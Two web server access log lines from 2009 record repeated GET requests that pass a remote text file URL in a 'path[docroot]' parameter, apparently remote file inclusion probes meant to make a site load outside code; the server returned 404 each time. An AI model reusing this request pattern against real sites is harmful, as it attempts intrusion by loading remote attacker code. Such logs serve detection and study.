211.234.111.100 - - [30/Jan/2009:10:59:55 -0800] "GET /logs/access_081112.log//?path%5Bdocroot%5D=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.234.111.100 - - [30/Jan/2009:10:59:57 -0800] "GET /logs/access_081112.log//?path%5Bdocroot%5D=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
